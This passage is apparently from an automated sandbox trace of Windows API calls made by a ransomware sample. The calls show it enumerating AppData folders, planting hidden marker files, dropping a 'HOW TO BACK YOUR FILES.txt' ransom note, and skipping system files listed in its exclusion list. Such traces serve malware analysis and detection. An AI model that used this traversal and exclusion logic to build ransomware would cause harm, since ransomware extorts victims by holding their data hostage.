lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData" [0065.139] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0065.139] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0065.139] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData" [0065.139] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\" [0065.139] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0065.139] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.141] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.143] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.144] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.144] CloseHandle (hObject=0x2a0) returned 1 [0065.144] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData") returned 102 [0065.144] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.144] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0273eb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0065.144] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.145] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.145] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.145] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.145] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0273eb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.145] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.145] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.145] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.145] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.145] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.145] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0273eb9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0273eb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0273eb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.145] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.145] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.145] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0273eb9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0273eb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0273eb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.145] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0065.145] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.145] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.146] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.146] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.146] CloseHandle (hObject=0x2cc) returned 1 [0065.146] CloseHandle (hObject=0x2a0) returned 1 [0065.146] GetCurrentThreadId () returned 0xd98 [0065.146] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0065.146] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC" [0065.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116520 | out: hHeap=0xe0000) returned 1 [0065.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0065.146] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC" [0065.146] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\" [0065.146] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0065.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.150] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.153] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.154] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.154] CloseHandle (hObject=0x2a0) returned 1 [0065.155] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC") returned 97 [0065.155] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.155] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x702a7000, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0273eb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0065.155] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.155] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.155] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.155] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.155] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x702a7000, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0273eb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.155] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.155] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.155] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.155] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.155] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.155] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0273eb9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0273eb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0273eb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.155] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.155] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.155] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x702cd265, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0065.155] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.155] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0065.156] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0065.156] lstrcpyW (in: lpString1=0x130ebfc, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0065.156] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0065.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0065.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd8) returned 0x11ba48 [0065.157] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x11d108 [0065.157] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x702cd265, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0065.157] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0065.157] lstrcpyW (in: lpString1=0x130ebfc, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0065.157] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0065.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0065.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x125f68 [0065.158] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x122308 [0065.158] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x702cd265, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0065.158] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0065.158] lstrcpyW (in: lpString1=0x130ebfc, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0065.158] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0065.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0065.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x126138 [0065.158] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x121fa8 [0065.158] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x702cd265, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0065.158] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.158] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.158] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0065.158] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0065.159] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0065.159] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0065.159] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0065.159] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0065.159] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0065.159] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0065.159] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0065.159] lstrcpyW (in: lpString1=0x130ebfc, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0065.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0065.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108688 [0065.159] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x121fe8 [0065.159] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x702cd265, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0065.159] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0065.159] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.159] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.160] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.160] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.160] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.160] CloseHandle (hObject=0x2cc) returned 1 [0065.160] CloseHandle (hObject=0x2a0) returned 1 [0065.160] GetCurrentThreadId () returned 0xd98 [0065.161] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0065.161] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp" [0065.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0065.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0065.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp" [0065.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\" [0065.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0065.161] CreateFileW 